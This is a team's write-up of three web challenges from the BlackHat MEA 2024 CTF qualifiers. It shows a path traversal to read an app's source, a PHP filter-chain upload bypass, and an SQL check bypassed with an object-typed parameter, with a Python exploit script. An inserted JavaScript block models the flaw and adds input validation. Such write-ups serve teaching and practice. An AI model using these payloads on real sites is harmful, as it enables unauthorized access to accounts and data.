
BlackHat MEA 2024 Qualifiers - Web Challenge Write-Ups
We're thrilled to share that our team made it into the Top 100 for the BlackHat MEA 2024 Qualifiers! Here are detailed walkthroughs for three web challenges we solved: Watermelon, Free Flag, and Notey. Each one tested different aspects of web exploitation, from file traversal to unconventional SQL logic.
Watermelon Write-Up
- Category: Web
- Points: 120
- Difficulty: Easy
Challenge Description
All love for Watermelons
Note: The code is not jailed - take care while crafting exploits.
Challenge Files
Walkthrough
1. Registration & Login
We registered a user via /register and grabbed the session cookie after login.
2. File Traversal → Admin Password
We discovered that app/app.py contained admin credentials and identified a file traversal vulnerability in the /upload path.
Using curl, we accessed /file/1/../../../app/app.py and extracted the password:
3. Admin Login & Cookie Hijack
We logged in with the credentials and copied the session:
4. Flag Retrieval
A simple GET to /admin with the admin cookie gave us the flag:
Free Flag Write-Up
- Category: Web
- Points: 110
- Difficulty: Easy
Challenge Description
Free Free
Challenge Files
Exploit Strategy
The application checked for specific content in uploaded files. We used the wrapwrap tool to generate a filtered payload:
python3 wrapwrap.py /flag.txt "<?php" "?>" 100
This created a long filter chain, bypassing content restrictions:
php://filter/convert.base64-encode|convert.iconv.855.UTF7|...
Retrieving the Flag
Posting the payload allowed us to bypass file inspection and retrieve the flag from inside a PHP wrapper.
Notey Write-Up
- Category: Web
- Points: 180
- Difficulty: Medium
Challenge Description
I created a note-sharing site. Don't try to access other people's notes - grass isn't greener :'(
Challenge Files
Vulnerability: Type Juggling → Logic Flaw
The app lets users view notes using an ID and secret. But the viewNote endpoint didn't validate input types, allowing arrays to be passed.
Sending:
/viewNote?note_id=66&note_secret[username]=admin
Resulted in this SQL query:
SELECT note_id, username, note FROM notes WHERE note_id = '66' AND secret = `username` = 'admin'
Which simplifies to:
... WHERE note_id = '66' AND 1
The condition evaluates to true because the username='admin' exists.
Alternative Bypass
If username isn't available, we could still bypass with:
/viewNote?note_id=66&note_secret[note]=test
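The mechanism behind both requests above, as an added example that is not part of the original write-up or the challenge's code: a simplified model of how a `?`-placeholder escaper expands an object into a column comparison, next to an input check that rejects non-string parameters. It assumes an Express-style query parser and the default object handling of the Node.js `mysql` package; `escapeId`, `escapeValue`, `buildQuery` and `validateParams` are hypothetical names.

```javascript
// Simplified model of placeholder escaping (assumption: the app bound
// user input to `?` with the Node.js `mysql` package defaults).
function escapeId(name) {
  return '`' + String(name).replace(/`/g, '``') + '`';
}

function escapeValue(val) {
  if (val === null || val === undefined) return 'NULL';
  if (typeof val === 'number') return String(val);
  if (Array.isArray(val)) return val.map(escapeValue).join(', ');
  if (typeof val === 'object') {
    // Root cause: a plain object expands to `key` = 'value' pairs,
    // so attacker-chosen keys become column names in the WHERE clause.
    return Object.keys(val)
      .map((k) => escapeId(k) + ' = ' + escapeValue(val[k]))
      .join(', ');
  }
  return "'" + String(val).replace(/\\/g, '\\\\').replace(/'/g, "\\'") + "'";
}

// Hypothetical reconstruction of the viewNote query from the write-up.
function buildQuery(noteId, secret) {
  return 'SELECT note_id, username, note FROM notes WHERE note_id = ' +
    escapeValue(noteId) + ' AND secret = ' + escapeValue(secret);
}

// Hardened input check: both parameters must be plain strings before
// they reach the query layer; objects and arrays are rejected with 400.
function validateParams(query) {
  const { note_id, note_secret } = query;
  if (typeof note_id !== 'string' || typeof note_secret !== 'string') {
    return { ok: false, status: 400, error: 'parameters must be strings' };
  }
  if (!/^\d+$/.test(note_id)) {
    return { ok: false, status: 400, error: 'note_id must be numeric' };
  }
  return { ok: true, noteId: note_id, secret: note_secret };
}

// Constructed inputs: what a qs-style parser yields for each request.
const benign = { note_id: '66', note_secret: 's3cr3t' };
const crafted = { note_id: '66', note_secret: { username: 'admin' } };

console.log(buildQuery(crafted.note_id, crafted.note_secret));
console.log(validateParams(crafted)); // rejected: note_secret is an object
console.log(validateParams(benign));  // accepted
```

If the application does use the `mysql` package, its `stringifyObjects: true` connection option also stops objects from expanding into column comparisons.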
Exploit Script
The session expired quickly (under 3 seconds), so we automated the entire flow:
import requests

base_url = 'http://a7c623f98ed8647acdccc.playat.flagyard.com'
username = "hanzala"
password = "11223344"

# Register and log in within one session so the cookie is reused
sess = requests.Session()
sess.post(f"{base_url}/register", data={"username": username, "password": password})
sess.post(f"{base_url}/login", data={"username": username, "password": password})

# note_secret[username]=admin is parsed server-side as an object, not a string
target_url = f"{base_url}/viewNote?note_id=66&note_secret[username]=admin"
exp = sess.get(target_url)
print(f"Flag: {exp.json()[0]['note']}")
Final Thoughts
These challenges blended practical web attack techniques with creative logic flaws. It was a rewarding experience to solve them under pressure, and making it into the Top 100 feels even better. Huge shoutout to the organizers and good luck to everyone in the next stage!
Happy Hacking,